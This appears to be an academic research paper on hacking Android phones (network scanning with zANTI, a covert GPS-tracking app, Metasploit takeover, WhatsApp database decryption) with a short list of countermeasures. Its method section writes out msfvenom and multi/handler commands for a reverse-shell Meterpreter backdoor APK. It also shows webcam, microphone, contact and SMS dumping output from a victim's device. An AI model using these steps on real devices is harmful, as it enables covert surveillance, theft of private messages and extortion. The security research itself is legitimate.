Android Device Hacking Tricks and Countermeasuresthe Android’s Webcam, decrypting the WhatsApp Instant Messaging, and more. Furthermore, the author was able to discover all of the

Android Device Hacking Tricks and

Countermeasures

Khulood Al Zaabi College of Technological Innovation

Zayed University

Abu Dhabi, UAE

[email protected]

Abstract -- Cybercrimes have increased against Android

devices due to the increased usage of Instant Messaging,

Global Positioning Systems (GPS) and Webcam

Applications which are built into the Android device,

resulting in invasion of the victim’s privacy. The

existing studies demonstrate how to utilize the

vulnerabilities of the Android device; however, none

have proposed a comprehensive study highlighting the

hacking tricks and their countermeasures. This study

demonstrates how to discover and fully control the

Android device using existing tools. Furthermore, it

proposes a novel GPS Tracking Application. The

purpose of this research is twofold: 1. To demonstrate

how to disclose the victim’s sensitive information after

performing diverse hacking tricks; and 2. To implement

countermeasures for each Android hacking trick. The

author believe that such a scenario is needed for

implementing awareness among Android device users.

Also, it shows Android and Instant Messaging

Application developers to mitigate existing

vulnerabilities, thereby enhancing security levels.

Keywords----Android Hacking; GPS Hacking; WhatsApp

Hacking; Android Hacking Tricks; Android Hacking

Tools; Countermeasures

I. INTRODUCTION

In the Post-PC era, the use of small, portable

tablets and Smartphones has skyrocketed. They have

become the preferred choice for communication,

performing online banking transactions, taking and

uploading photos and videos, sending messages via

Instant Messaging Applications (i.e. WhatsApp),

pinpointing locations using the Global Positioning

System (GPS), and more. The number of Smartphone

users has reached around 7 billion worldwide.

Currently, the Android Operating System has gained

significant popularity over the Apple device since

being released into the mobile industry in 2008 [1, 2,

3]. The Smartphone is popular due to significant

improvements in its functionality, and because it has

the capacity to store a considerable amount of the

user’s sensitive data [2, 4]. However, the Smartphone

has also become more susceptible to cybercrimes that

violate the victim’s confidentiality, integrity, and

availability [1, 5, 6]. As stated by the Norton Report

in 2013 [5], 38 percent of Smartphone users are being

targeted by criminal activities. The scope of this

paper is to concentrate on the Android hacking tricks

and

countermeasures. In other words, the research paper

focuses on how criminals utilize the Android’s built-

in vulnerabilities, and showcases how they overtake

the victim’s phone by using diverse hacking

strategies in order to violate their victim’s personal

information. The remainder of this paper is organized

as follows: Section II presents the “Background and

Related Work” where I review the previous literature

regarding hacking tricks for Android devices. In

section III, I talk about the “Problem and

Motivation”. Section IV illustrates the “Proposed

Approach” and the tools and techniques used. This is

then followed by an overview of my “Experimental

Results” in section V, and the results are discussed in

the section titled “Experimental Discussion”. In

section VII, I conclude my research and propose

“Future Work”.

II. BACKGROUND AND RELATED

WORK

The domain of Android hacking is an ever-

evolving area at both the individual and business

level due to the unique characteristics, features, and

flexibilty of this device. In the following sections, the

research paper will introduce: 1. The Android device

platform; 2. An overview of the WhatsApp Instant

Messaging Application, and 3. The Global

Positioning System.

A. Android Device Platform

The Open Handset Alliance (OHA) developed an

open-market Operating System which strives to

“accelerate innovations in mobiles and offers

consumers a richer, less expensive, and better mobile

experience” [7]. Gartner Inc. stated that the Android

device embraced 25.5% of the world’s Smartphone

sales. According to the IDC Q2 2014 report [8], the

Android device occupied 85% of the market as seen

in Fig. 1. However, sophisticated criminal offenders

have become familiar with the Android device’s

built-in vulnerabilities and loopholes [1, 9].

Cybercriminals have made millions of dollars by

deceiving Android users by requesting them to

download malicious third-party Applications [5]. The

unverified Applications subsequently grant the

attacker full access to the victim’s sensitive data [5,

8].

Fig. 1. Distribution of mobile operating system in Q2 2014,

according to IDC. Source (media.kaspersky, 2014)

B. Overview of WhatsApp Instant Messaging

Application

In September 2015, the popularity of the

WhatsApp messaging application reached 900

million users worldwide as shown in Fig. 2 [10, 11,

12, 13]. WhatsApp is a free proprietary cross-

platform messaging application which is installed on

a client's Smartphone and is not operable without the

Internet. The user can then subscribe to the

WhatsApp service to send text messages, share

images, videos, locations and more with other

WhatsApp users [10, 13, 14, 15]. In late January

2015, Koum [10] announced on his Facebook page

that:

“Our web client is simply an extension of your

phone: the web browser mirrors conversations and

messages from your mobile device—this means all of

your messages still live on your phone”

Koum's announcement was about the release the

WhatsApp PC desktop version called “WhatsApp

Web” [10, 12, 13]. This version supports all desktop

browsers except for the Microsoft Internet Explorer

and was activated to work with Google Android,

Windows Phones, Nokia, iPhones, and BlackBerry

devices [10, 12, 14]. Due to the increase in the

numbers of WhatsApp Web users, now reaching 200

million, cyber-attacks are also on the rise, thus

compromising the personal data stored on the these

devices [11, 12].

Fig. 2. Number of monthly active WhatsApp users worldwide (in

millions). Source (statista, 2015)

C. Global Positioning System (GPS)

The Global Positioning System was developed by

the U.S Department of Defense (DoD) in 1995, using

24 satellites. This system is capable of operating with

civil, commercial, and military users around the

globe [16]. The Android GPS is part of the Google

Play Services, which tracks and pinpoints the exact

location of the users [17]. GPS users can utilize both

the built-in GPS and Network Location Provider

(NLP). The GPS is more accurate than the NLP;

however, it is only capable of being operated

outdoors. Moreover, the GPS takes a long time to

forward the requested location. On the other hand,

the NLP consumes less battery power than the GPS

and can be operated indoors and outdoors. However,

identifying the user's location is complicated because

the longitude and latitude becomes different every

time the user moves to a new place.

This section presents a comprehensive review of

the plethora of related research studies that cover

Android device hacking techniques. More

specifically, it focuses on the hacking of Android

Applications, Android Messaging Application such

as WhatsApp, Global Positioning Systems on

Android devices, describing the various types of

attacks and the countermeasures. Whether or not the

Application is running, Wu and Li [18] succeeded in

hacking the Android Application by proposing two

methods: static and dynamic methods. In the static

method, they modified the Application’s dex and

APK files, while in the dynamic method, they

modified the execute byte code. Moreover, they

concluded their research by discussing how to detect

and protect the Android Application against these

types of attacks [18].

Abura’ed et al. [19] discussed three exploitable

vulnerabilities: 1. Overriding the default behaviors of

buttons; 2. Access permissions, and 3. The lack of

identity indicators used to perform phishing attacks

using a Trojan. They succeeded in imposing a

significant threat without the victim’s knowledge,

and without degrading the victim’s machine

performance. In addition, they recommended

enhancing the Android’s security against these types

of attacks by monitoring the machine’s running

process, implementing the SSL certificate for each

trusted Application, and keeping the identity

indicator such as the watermark [19]. Erich and Cliff

[20] conducted a novel denial-of-convenience attack

against Android and iPhone devices for non-technical

users. The researchers exploited the Smartphone’s

connectivity management protocol by configuring a

fake Wi-Fi access point, and forcing their victims to

connect via the non-valid access point. This was done

with the purpose of disabling the Internet connection

availability of their victims. At the end of their

research, they proposed a novel Internet access

validation protocol as a defense against this type of

attack. The proposed solution used cellular networks

in order to send a secret key phrase to the Internet’s

validation server [20].

Furthermore, Yubo et al. [21] presented their

research on how to deploy a malware against a

Smartphone device such as the Android system. This

was accomplished by manipulating the Short

Message System (SMS) protocol and using the Short

Message Type (RS MT) as an attack vector. Next,

they attempted to forward this message to the

victim’s device by using a Software Defined Radio

(SDR). The authors achieved their goal after proving

that the device’s antivirus software was not able to

detect the injected attack [21]. Additionally, Nguyen

et al. [22] achieved their goal in stealthily discovering

the target’s location without the victim’s consent, by

developing an unauthorized Location Inference

(UnLocIn) approach. This approach was possible

with the insensitive Wi-Fi permission, as it bypassed

the malware detection technique. The researchers

examined 51 free Apps on Google Play, and

succeeded in inferring the target’s location with a 50-

meter accuracy range. This paper also discussed how

to counter the proposed UnLocIn attack [22]. While

[23] described the most common social engineering

attack techniques on knowledgeable workers,

Krombholz et al. presented comprehensive

terminology that assisted them in classifying the

social engineering attacks in terms of four

parameters. These parameters include the attack

channel, the attack operator, various kinds of social

engineering and realistic attack scenarios. Moreover,

this research included the most advanced attack

vectors within the common communication channels

and computer-supported collaboration, such as

Mobile Messaging Applications (i.e. WhatsApp). In

addition, the researchers supported their research by

describing countermeasures against this type of

attack [23]. In this paper, Krombholz et. al.

demonstrated the Cross-site scripting attack

(XSS)techniques used against the Android's

WebView, whereas, Bhavani [24] utilized the Web

Application vulnerabilities to exploit the victim’s

WebView, by launching a malicious code through the

HttpClient APIs. The researcher concluded that this

type of attack can result in disclosing the victim’s

sensitive information (i.e. phone contacts), session

hijacking, and stealing the cashed cookies in order to

impersonate the victim [24].

This paper complements the existing research by

conducting various types of hacking tricks against

Android devices. However, the previous work did not

demonstrate a comprehensive hacking phase such as

the one conducted in this research. The author of this

paper performed social engineering tricks to discover

the victim’s current geolocation (GPS hacking).

Moreover, the researcher intended to gain full control

of the victim’s Android device, such as overtaking

the Android’s Webcam, decrypting the WhatsApp

Instant Messaging, and more. Furthermore, the author

was able to discover all of the active devices which

were connected to the same attacker’s network using

the zANIT. Lastly, the researcher presented

countermeasures for each trick in order for the

victims to become savvy in safeguarding themselves

and also, protecting their private information from

being exposed to attackers.

III. PROBLEM AND MOTIVATION

As reported by the Google Investor website [9],

over 350,000 devices are being activated daily as of

February 2011. This is because of the Android’s

Smartphone features which enable communication

between individuals and businesses with a high level

of information management. However, the developer

of the Android device offers it in the open-market

model with limited controls. As a result, the Android

Operating System and its Applications have become

susceptible to critical security threats by sophisticated

criminals who spy on users and violate their privacy

via the Internet [1]. Kaspersky Lab’s security [8]

illustrates various types of attack statistics against

Android users in May 2012 (Fig. 3). Their study

stated that the number of Android attacks and the

targeted users grew dramatically during the period

between August 2013 and July 2014 [8].

Fig. 3. Detections by Kaspersky Lab’s security of cyber-attacks on

Android. Source (media.kaspersky, 2014)

The recently released WhatsApp Desktop version

not only attracts users, but also attracts

cybercriminals. It allows them to launch a series of

attacks such as spreading malicious messages for the

purpose of infecting the user's phone device and

invading their privacy for monetary benefits [25].

This is one of the reasons why the authors employed

hacking techniques against WhatsApp and the

Android device’s GPS. According to Ralf-Philipp

Weimann, a researcher at the University of

Luxembourg [26], the GPS is a critical Android

device vulnerability. The issue begins when the

Android device asks the victim to pinpoint their

approximate location on the cellular network. These

messages are then sent to an unsecured Internet link,

which encourages the attacker to trick the Android

device into exchanging the location message with

them, instead of the cellular network. As a result, the

attacker is able to track the victim’s location, and

also, to send a malicious code directly onto the

victim’s device processor. This is done with the

purpose of remotely controlling the victim’s

Smartphone [26]. The goal of the present research

was to identify these vulnerabilities, exploit them,

and implement countermeasures.

IV. PROPOSED APPROACH

To conduct the experimental scenarios, the author

configured a Laptop with the required mobile

hacking tools, as well as two Samsung Galaxy S3

devices. The "Rooted" Android device acted as an

attacker to exploit the victim’s device, while the other

one was used as the victim's device featuring various

types of vulnerabilities for exploitation purposes. The

devices were used for the purpose of performing

diverse types of Android hacking tricks by using

different tools and hacking techniques. By using the

Android Studio, NetBeans IDE, and PHP

respectively, the author proposed various types of

Android hacking tricks against the victim’s device.

GPS Tracking was the first trick used to identify the

current victim’s geolocation. Moreover, all of the

discovered live devices were connected to the same

network as the attacker using the zANTI Application,

as well as the victim’s built-in Webcam, decrypting

WhatsApp and the Kali Linux NetHuntertool (i.e.

Metasploitable Framework). The author’s intention in

this research was to alert WhatsApp users, as the App

plays a significant role in tracking their geolocation

and disclosing their privacy, especially after the

author’s success in exploring WhatsApp

vulnerabilities when overtaking the Android device.

The main thrust of this research was threefold: 1. To

discover the victim’s active device and its associated

features using the zANTI discovery tool; 2. To track

the victim’s geolocation, device ID, and Timestamp

using the GPS Tracking Application; and 3. To take

control of the victim’s Android device using Kali

Linux and its associated Applications (i.e.

Metasploit). In the following sections, the paper

presents the requirements and the installation

instructions for all of the hacking tricks conducted.

A. Network Map Discovery

The attacker browsed their Android device using

Starbucks' Wi-Fi public network for the purpose of

hunting their victim. The zANTI penetration testing

tool assisted them in achieving their goal. Therefore,

in order to install the zANTI, the attacker rooted her

Android device by installing the “KingRoot”

software, Kingroot.apk file from Play Store. The

rooted device was verified by installing the “Root

Checker Basic” as illustrated in Fig. 4.

Fig. 4. Root Checker Basic Software

Then the attacker downloaded the zANTI.APK file

from Zimperium Mobile Security, and installed it on

their Android device, allowing her to discover all of

the connected devices such as Laptops and mobile

devices. Fig. 5 illustrates the zANTIL software

interface, including all of the active devices that were

connected to the same network as the attacker. In

this scenario, the attacker started probing this

Android device with an IP address of “192.168.x.x”

and connected via “port 0”. All logs and Nmap scan

outputs were displayed for the targeted Android

devices. The attacker could then perform advanced

scans against her target, by specifying the scan types

from the “Operative Actions” option, then connecting

to the remote ports to exploit the open ports and

discovering vulnerabilities. This was conducted using

diverse types of attacks such as the Man-in-the-

Middle attack. In addition, it could also check and

crack weak passwords, as well as verify the target’s

“ShellShock” and “SSL Poodle” vulnerabilities.

Moreover, the attacker could perform “Smart

Scanning” which enabled her to automatically check

for vulnerabilities. In this scenario, the attacker

intended to perform an “Intense Scan”, which is also

known as an “Intrusive Scan” against the targeted

device. This type of attack permits the attacker to

detect versions and scripts of the Operating System.

Fig. 5. zANTI Software Interface

B. GPS Tracking

In this section, the attacker intended to track her

victim’s current geolocation with their permission, by

designing two different Applications. These are the

Android App “app-release.apk” (Android Application

Package File), using the Android Studio, and the

Desktop App “GPS_Tracker.jar", which is designed

using the NetBeans IDE. The Android App has three

classes: the GPS.java, the Launcher.java, and the

PostTask.java. The GPS.java is a type of Android

service and it implements the LocationListener which

is triggered when the GPS location is changed. In

addition, the “toString()” method is used to obtain the

location, based on the last updated time. Lastly, the

.java represents the launcher activity in the Android

java, and has a layout called “activity_launcher.xml”,

which consists of a label and a button. Therefore,

whenever the user clicks on the “Get GPS Position”

button, the launcher activity retrieves the current

geolocation from the GPS.java and displays it on that

label. Furthermore, the third class PostTask.java is

used to get the geolocation from the launcher.java,

and posts it onto the attacker’s Webserver. Fig. 6

illustrates the AndroidManifest.xml file.

Fig. 6. AndroidManifest.xml file

The second App, which is a desktop has one class

“Launcher.java”, which is linked with two functions:

the clearTable() and the refreshTable(). The

“ClearTable” function is used to connect to the server

and clears the database files which have old logs. The

“RefeshTable” function is used to connect to the

Webserver to search for and retrieve old records.

Moreover, this App has a JTable which encompasses

four columns: the Serial Number, the Device’s ID,

the GPS’ location (latitude and longitude), and the

Timestamp (in GMT). Normally, for the purpose of

Tracking Applications, the attacker creates two

scripts and one text file to be available on her

Webserver which are “gps.php”, “clear.php”, and

“gps.txt” respectively. The gps.php script is used to

receive data from the Android App and these records

are saved onto the “GPS.txt” file, while, the

“clear.php” script is used to delete all entries from the

gps.txt file located on the attacker’s Webserver. The

malicious user performed social engineering

techniques to send the “app-release.apk” file onto her

victim’s Android device. After downloading the

received .apk file and accepting the displayed

permissions, the victim installed the “My GPS

Finder” on their Android device’s App interface, as

illustrated in Fig. 7. Later, and whenever the victim

used the “GPS_TRACKER APP” to check the GPS

details, the App secretly sent details such as the

Android device’s ID, the current geolocation

(latitude and longitude), and Timestamp in GMT

time-zone, and recorded them onto the Webserver of

the hacker. Therefore, the victim’s sensitive

information was monitored and displayed onto the

attacker’s Desktop App which was linked with the

Webserver.

Fig. 7. My GPS Finder App Permission

C. Overtake Android Device

In this study, the attacker intended to take control

of the victim’s Android device, in particular the

Android’s Webcam and decrypting the WhatsApp

using the Kali Linux NetHunter which was installed

on the attacker's Android device. The Metasploit

Framework exists on the Kali Linux NetHunter,

which is a computer security project used for both

penetration testing and executing the exploit code

against the targeted machine. So, in order to install

the Kali Linux NetHunter onto the Android device

(i.e. Samsung) in chroot mode, the malicious users

need to install the following three Applications from

the Android’s Play Store:

Busy Box: which provides the user with

several UNIX tools in a single executable file;

Linux Deploy: an open-sourced software used

for easy installation of the Operating System

and GNU/Linux on the user’s Android device,

and

VNC Client, or VNC Viewer: is a remote

access and control software which is

compatible with Windows, Mac, UNIX and

Linux machine agents, or a centralized server

is required.

The next step was to install these Applications

onto the attacker’s Android device. As mentioned

earlier, the Busy Box should be installed first to grant

the attacker a Root user. Moreover, the attacker

should ensure that she has a good Internet connection

and she needs to keep the installation options as the

default. However, she should modify the distribution

by choosing “Kali Linux”. Then, the installation

process should run until it is completed in order to

move to the next step, which is clicking on the

“Start” button to run the container. Now, the VNC

Viewer Applications will be used to connect to the

container when entering these values such as

ADDRESS (i.e. localhost), NAME (i.e. Kali), and

PASSWORD. After setting these values, the

“Connect” button should be pressed to display the

Kali Linux interface and therefore, start the Webcam

snapping without the victim’s knowledge. The

attacker is now able to launch her attack by creating a

backdoor (.apk), typing the attacker's IP address

(LHOST) and attacker’s port number (LPORT)

respectively; msfvenom –p

android/meterpreter/reverse_tcp;

LHOST=<xxx.xxx.xx.xx>LPORT<xxxx> R >

/root/<filename.apk. Then, the Metasploit console

will be loaded to install a listener by setting up a

reverse payload, and the listener begins by typing the

“Exploit” command as the following: msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

setLHOSTxxx.xxx.xx.xx

setLPORTxxxx

exploit

After that, the attacker performed social

engineering against her victim with the purpose of

convincing them to download the fake.apk file by

enabling the “Unknown sources: Allow the

installation of non-Market Apps” option as shown in

Fig. 8.

Fig. 8. Download .apk File onto the Victim’s Android Device

When the victim opened the fake.apk file and

downloaded it onto their device, the meterpreter

prompt popped-up. The intention was to hack the

victim's Webcam, so that the attacker could take

control of it by typing “webcam_list” to list all of the

victim’s front and back Webcams. The next step was

to take a photo without the victim's knowledge using

the “webcam_snap” 1command. Moreover, the

attacker performed various activities when she

successfully took control of the victim’s Android

device. These include discovering the Android’s

system information, disclosing the victim’s contacts

list, dumping the victim’s SMS messages, and

1By default, the webcam_snap command was used to take a photo using the first (Back) camera

sending SMS messages from the attacker's device

onto the one of the victim’s contacts list.

Furthermore, the malicious user intended to disclose

and decrypt the victim’s WhatsApp database by

employing the following files: the

“msgstore.db.crypt8” and the key which is used to

decrypt the encrypted database using commands.

Lastly, the researcher installed the “Windows

WhatsApp Viewer App” for the WhatsApp Database

decryption purposes. The first step was to insert the

“msgstore.db.crypt8” and the key files, generate the

“msgstore.decrypted” file, and view this file as

illustrated in Fig. 9.

Fig. 9. WhatsApp Viewer

V. EXPERIMENTAL RESULT

The author conducted various types of hacking

tricks against the victim’s Android device as was

mentioned in the previous section. The first hacking

trick was performed using scanning from Starbucks’

public network. This was done with the purpose of

discovering all active Android devices connected to

the same network of the attacker using the zANTI

penetration testing toolkit. Fig. 10 illustrates the

Nmap Scan Output of the zANTI. The victim’s

device (IP address) was detected, which

corresponded with all of the open/filtered and closed

ports that were associated with its service for both

protocols, UDP and TCP. This output displays the

existence of the vulnerable ports which were utilized

to launch an attack against the targeted device.

Moreover, the attacker received the following

message after OS fingerprinting for the targeted

device: “Too many fingerprints match this host to

give specific OS details”. Furthermore, the zANTI

network discovery tool obtained a lot of information:

traceroute results such as the number of hops (1

HOP), Round Trip Time (RTT: 13.18ms), the

targeted IP address (192.168.x.x), the number of

active hosts (1 host up), and all scanned ports were

closed.

For the second round of hacking tricks, the attacker

gained the current geolocation; latitude and

longitude, the device’s ID, and the Timestamp values

by performing GPS Tracking. These values varied in

accordance with the victim’s current geolocation, and

changed from minute-to-minute whenever the victims

attempted to check their GPS using the customized

Application called “My GPS Finder”.

Fig. 10. Nmap Scan Output of the zANTI

Fig. 11 illustrates the victim’s current geolocation

at Timestamp Thursday 10 10:30:51 GMT +05:30

2016, with a latitude value of “24.7531393” and a

longitude value of “78.8387845” while using the

“My GPS Finder” App.

Fig. 11. Victim’s Current Geolocation at Timestamp Thursday 10

10:30:51 GMT +05:30 2016

Moreover, the attacker was able to monitor her

victim’s current geolocation as illustrated in Fig. 12.

The “GPS Tracker Interface” Desktop App, displayed

four different latitude, longitude, device ID and

Timestamp values for three different locations and

Timestamps. Furthermore, the attacker continued her

malicious activities by taking control of the victim’s

Android device, more specifically, the Android’s

Webcam and by decrypting the victim’s WhatsApp

database.

Fig. 12. GPS Tracker Interface App

The attacker succeeded in taking control of the

Android’s Webcam and taking a photo using the back

camera of their victim’s Android device without their

knowledge. They saved the Webcam shot on this

path: /root/JHOJRDTz.jpeg. Table 1 illustrates the

victim’s sensitive information which was found on

the Android device after taking control of it.

Table 1. Outputs generated after Overtaking Victim’s Android

Device Command Output

sysinfo Computer : localhost

OS : Android 4.4.4 - Linux 3.4.0-2656 armv7l)

Meterpreter : java/android

dump_contacts [*] Fetching 6 contacts into list [*] Contacts list saved to:

contacts_dump_20160315121308.txt

dump_sms [*] Fetching 36 sms messages

[*] SMS messages saved to: sms_dump_20160315121421.txt

webcam_snap -

1 2

Webcam shot saved to:

/root/YPAxqHMj.jpeg

record_mic 5 Audio saved to: /root/EyYFewpa.wav

send_sms -d

+97150xxxxxx

x -t "Hi Khulood."

[+] SMS sent - Transmission successful

Furthermore, the decrypted WhatsApp database

was disclosed by the malicious user as shown in Fig.

13. The WhatsApp Viewer App detected sensitive

information about one of the victim’s WhatsApp

contact list. These include the phone number starting

with the country code, last message Timestamp, and

a WhatsApp chat between the attacker’s victim and

the victim’s WhatsApp contact list.

Fig. 13. msgstore.decrypted.db (WhatsApp Viewer)

VI. EXPERIMENTAL DISCUSSION

The attacker succeeded in discovering all live

devices with their open TCP or UDP ports associated

with the services running on the targeted device. The

scanning process is the second phase after

reconnaissance, which involves discovering all of the

target’s active IP addresses, open ports, and finding

vulnerabilities related to the device’s OS, and more.

An attacker commented that the zANTI pen-testing

tool was powerful while using it for Android hacking.

However, the “Too many fingerprints match this host

to give specific OS details” message appeared while

performing an intense scan (advanced scan) against

the target’s Android device. This message appeared

when there were no open ports responding to the

network traffic. As a result, the zANTI was not able

to perform an OS detection. Moreover, it relies on the

type of scan being used. In addition, the attacker

came to realize that the scan type used during the

experiment was not the best type if his intention was

to footprint the target device’s OS. However, the

current hacker was neither able to perform the Man-

in-the-Middle attack against her target’s device, nor

to crack the victim’s Android device as they received

a message that “cracking 192.168.x.x service

<Protocol> [http-get /], finished, no results”. In

addition, the attacker discovered that the target’s

device was not vulnerable to the ShellShock and SSL

Poodle vulnerabilities.

Currently, GPS Tracking is considered to be one of

the most crucial hacking tricks that threatens

Smartphone users around the globe. As discovered in

this study, it is capable of revealing the victim’s vital

information such as the device's ID and geolocation.

It can therefore assist the attacker to visit the victim’s

geolocation and perform advanced hacking

techniques such as social engineering, which can

result in stealing money from the attacker's victims.

The paper’s author was able to track the current

geolocation of the targeted Android device, and

disclose their device's ID for every Timestamp when

the victims used the phishing GPS App. Besides that,

the malicious Android App developer achieved her

goals by designing and linking the fake GPS App

onto her Webserver, and therefore, monitored and

displayed it onto her Desktop Interface as shown in

Fig. 12. This technique and the customized GPS App

updates the attacker regarding her victim’s

geolocation, records them onto the log files in

chronological order, and utilizes these records for

future cybercrime activities. Also, social engineering

plays a main role in performing GPS hacking.

Currently, an attacker can switch on/off the victim’s

GPS or even the Internet using the .apk file which

can be forwarded onto their victim via social

engineering tricks. In the case of this research, GPS

Tracking was performed with the victim’s permission

to specify the current geolocation specifications.

Also, the Android Studio tool assists the malicious

user in creating fake .apk files to track her victims.

Therefore, users should be aware of this type of

hacking trick. However, the GPS has advantages,

despite its risks. From the perspective of forensic

examiners, law enforcement agencies and parental

supervision, a GPS is beneficial in many ways. It can

assist them to detect crimes, reveal threats to the

parents’ children, or to monitor their children’s

movement. It can also be used to protect children

from pornography-related types of crime, by

preventing their children from sharing their location

to meet with others, for example.

Taking control of the victim’s Android device

played a significant role in this study. Using the

Metasploit which is a pen-test tool used by both pen-

tester and attacker simultaneously, the attacker was

able to fully control the victim’s device without their

knowledge. This trick is dangerous, as the attacker is

able to disclose the victim’s privacy such as dumping

the contacts list, WhatsApp list and conversations in

plain-text, Webcam snap and more. Furthermore, this

tool can launch malicious codes which are generated

by the same tool (fake.apk file), to then overtake the

victim’s device, either by being connected on the

same network (LAN), or a different network (WAN).

In this study, the malicious user snapped the victim’s

photo and saved it onto her website to be utilized

later for black mail, which is also called extortion

mail. This type of cybercrime has become

increasingly common nowadays. Table 1 illustrates

the researcher’s finding after controlling the Android

device and revealing crucial information about that

device, such as the Operating System installed on the

targeted device. By knowing the device’s OS, the

attacker can footprint the devices’ vulnerabilities by

performing Search Engine techniques to seek updated

vulnerabilities and their patches. This is conducted in

order to attempt to design a sophisticated exploitation

against the vulnerabilities of the security controls,

and therefore, continue her hacking activities.

Moreover, the device's OS assists the attacker in

creating fake patches for these OS, and she then

upload them onto the Android’s Play Store, which

results in a hacking activity. Furthermore, the paper’s

author succeeded in disclosing 6 of the victim’s

contacts lists and 36 of the victim’s SMS messages,

and then saved them onto her website. In addition,

the researcher was able to send SMS messages from

metasploit onto the victim’s contact list. This hacking

trick is widely used, not only to track more victims,

but also to impersonate a victim. She commit her

crimes using the victim’s device, which is also called

“Daisy Chaining”. This is done to hide her identity,

and therefore counter law enforcement agencies by

misleading and delaying their investigation process.

Furthermore, this trick is currently appearing in

cyberwar committed against countries in order to

deceive their enemies after taking over one of their

soldier’s phone devices. This trick is beneficial for

law enforcement agencies, especially if they would

like to discover the identity of the real criminal. Not

only that, but WhatsApp is also considered a crucial

cyber-attack platform at the present time to determine

the victim’s location. In this study, the researcher was

successful in dumping and decrypting the victim’s

WhatsApp database, including the victim’s contact

list of phone numbers with country codes, the

messages’ content, and the last message Timestamp.

The researcher implemented the following

countermeasures for each type of Android hacking

tricks for the purpose of mitigating or eliminating the

risks generated from the Android’s hacking tricks,

and thereby safeguarding the victims:

Avoid social engineering, by not loaning or

borrowing other Android phones, as this can

allow criminals to scan the WhatsApp QR code

(WhatsApp Web);

Avoid opening any suspicious links;

Use the relevant GPS radio jamming or phone

frequencies to counter satellite Tracking devices;

Avoid accepting any received .APK fake files;

Avoid sharing locations via WhatsApp;

Check the third party’s authenticity before

downloading its Applications;

Protect the Android device from being tricked by

SMS Trojans by implementing controls;

Pen-test the Android device using zANTI;

Be very cautious while browsing an Android

rooted device as it will have Superuser

privileges;

Avoid connecting the Android device to public

Wi-Fi connections and,

Make sure to disable this option: “Install Apps

from unknown sources”

VII. CONCLUSION

Overall, my research identifies the most critical

vulnerabilities within the Android device and/or with

its associated third party Applications such as

WhatsApp and GPS, which are currently considered

to be crucial cybercrime platforms within cyberwar. All users are advised to be wary while using their

Android device. They should co-operate with both

Android device companies and third party

Applications (i.e. WhatsApp) in identifying any

noticeable and critical vulnerabilities. These should

then be reported in order to mitigate any loopholes

before they are exploited by a potential attacker.

Furthermore, the Android device developer must

enhance the device's security levels to protect their

customers and avoid losing their trust. Also, Android

users should be wary of GPS Tracking by learning

about social engineering tricks that can prevent

attackers from accessing their GPS Tracking.

Moreover, zANTI may assist the security analyst in

thwarting the malicious users, by identifying and

alerting them to the device's vulnerabilities, and also,

may simultaneously assist the hacker in exploiting

the vulnerabilities of the victim’s device. The

recommended future research is to conduct reverse

engineering to regenerate a new .APK file with a

legitimate interface, so that it can be then uploaded

onto the App Store, to better analyze the

vulnerabilities of prospective victims worldwide.

Furthermore, it would be able to create an .apk file to

track the victim’s location. In other words, to switch

the GPS on whenever the attacker chooses.

Moreover, the paper’s author would like to conduct a

Stagefright attack code against vulnerable Android

device through text or MMS, for the purpose of trick

investigating other exploitable vulnerabilities with

Android devices.

REFERENCES

[1] Gupta, A. (2014, March). Learning Pentesting for Android

Devices (1st ed.).

[2] Packtpub. (2015). Practical Mobile Forensics. Retrieved March 06, 2016, from

https://www.packtpub.com/packtlib/book/ApplicationDevelopme

nt/9781783288311/pref05 [3] Casey, E., 2011, Digital evidence and computer crime:

Forensic science, computers, and the internet, Academic press

[4] Bommisetty, S., Tamma, R., & Mahalik, H. (2014, July). Practical Mobile Forensics (1st ed.). Birmingham, UK: Packt

Publishing.

[5] Ballano, M. (2014, August 11). Mobile Attacks: Cybercriminals' New Cash Cow. Retrieved March 06, 2016, from

http://www.symantec.com/connect/blogs/mobile-attacks-

cybercriminals-new-cash-cow [6] Chell, D., Erasmus, T., Colley, S., & Whitehouse, O. (2015).

The Mobile Application Hacker's Handbook.

[7] Lessard, J., & Kessler, G. (2010, September). Android Forensics: Simplifying Cell Phone Examinations. In Small Scale

Digital Device Forensics Journal, vol. 4, no. 1. [8] Kaspersky. (2014, October). Mobile Cyber Threats.

Retrieved March 06, 2016, from

http://media.kaspersky.com/pdf/Kaspersky-Lab-KSN-Report-

mobile-cyberthreats-web.pdf

[9] Hoog, A. (2011). Android Forensics Investigation, Analysis and Mobile Security for Google Android.

[10] Wikipedia. (2015). WhatsApp. Retrieved March 06, 2016, from https://en.wikipedia.org/wiki/WhatsApp

[11] Buchanan, I. (2015, September 9). 200 million Whatsapp

users open to attack. Retrieved March 06, 2016, from http://geekpower.co.uk/2015/09/200-million-whatsapp-users-

open-to-attack/

[12] Global Positioning System. (2007, January 11). Countermeasures against GPS trackers. Retrieved March 06,

2016, from

https://globalpositioningsystem.wordpress.com/2007/06/11/countermeasures-against-gps-trackers/

[13] Statista. (2015). Number of monthly active WhatsApp users

worldwide from April 2013 to September 2015 (in millions). Retrieved March 06, 2016, from

http://www.statista.com/statistics/260819/number-of-monthly-

active-whatsapp-users/ [14] TechAdvisor. (2011, September 12). WhatsApp Android app

review. Retrieved March 06, 2016, from

http://www.pcadvisor.co.uk/review/android-tablet-apps/whatsapp-android-app-review-3302802/

[15] The FORGE. (2015). Whatsapp: Overview. Retrieved March

06, 2016, from https://theforgecoc.wordpress.com/whatsapp-overview/

[16] Wikipedia. (2015). Global Positioning System.

Retrieved March 06, 2016, from https://en.wikipedia.org/wiki/Global_Positioning_System

[17] Developers. (2015). Location Strategies. Retrieved March

06, 2016, from http://developer.android.com/guide/topics/location/strategies.html

[18] Wu, X., & Li, X. (2013, October). Hack android application

and defense. In Computer Science and Network Technology (ICCSNT), 2013 3rd International Conference on (pp. 676-680).

IEEE.

[19] Abura’ed, N., Otrok, H., Mizouni, R., & Bentahar, J. (2014, November). Mobile Phishing Attack for Android Platform. In

Innovations in Information Technology (INNOVATIONS), 2014 10th International Conference on (pp. 18-23). IEEE.

[20] Zou, C., & Dondyk, E. (2013, January). Denial of

convenience attack to smartphones using a fake Wi-Fi access point. In Consumer Communications and Networking

Conference (CCNC), 2013 on (pp. 164-170). IEEE.

[21] Yubo, S., Zhiwei, Z., & Yunfeng, X. (2014, November). Using Short Message Service (SMS) to deploy Android exploits.

In Cyberspace Technology (CCT 2014), International Conference

on (pp. 1-5). IEEE. [22] Nguyen, L., Tian, Y., Cho, S., Kwak, W., Parab, S., Kim, Y.,

